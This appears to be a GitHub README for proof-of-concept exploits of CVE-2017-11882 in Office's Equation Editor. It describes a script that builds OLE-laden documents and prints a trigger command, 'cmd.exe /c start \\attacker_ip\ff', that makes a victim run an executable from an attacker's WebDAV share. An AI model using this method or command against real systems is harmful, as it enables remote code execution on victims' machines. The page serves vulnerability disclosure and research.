Skip to content
Proof-of-Concept exploits for CVE-2017-11882
Branch: master
Clone or download
Pull request Compare This branch is even with embedi:master.
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Type Name Latest commit message Commit time
Failed to load latest commit information.



MITRE CVE-2017-11882:


Patch analysis:

DEMO PoC exploitation:

webdav_exec CVE-2017-11882

A simple PoC for CVE-2017-11882. This exploit triggers WebClient service to start and execute remote file from attacker-controlled WebDav server. The reason why this approach might be handy is a limitation of executed command length. However with help of WebDav it is possible to launch arbitrary attacker-controlled executable on vulnerable machine. This script creates simple document with several OLE objects. These objects exploits CVE-2017-11882, which results in sequential command execution.

The first command which triggers WebClient service start may look like this:

cmd.exe /c start \\attacker_ip\ff

Attacker controlled binary path should be a UNC network path:


Usage -u trigger_unc_path -e executable_unc_path -o output_file_name

Sample exploit for CVE-2017-11882 (starting calc.exe as payload)

example folder holds an .rtf file which exploits CVE-2017-11882 vulnerability and runs calculator in the system.

You can’t perform that action at this time.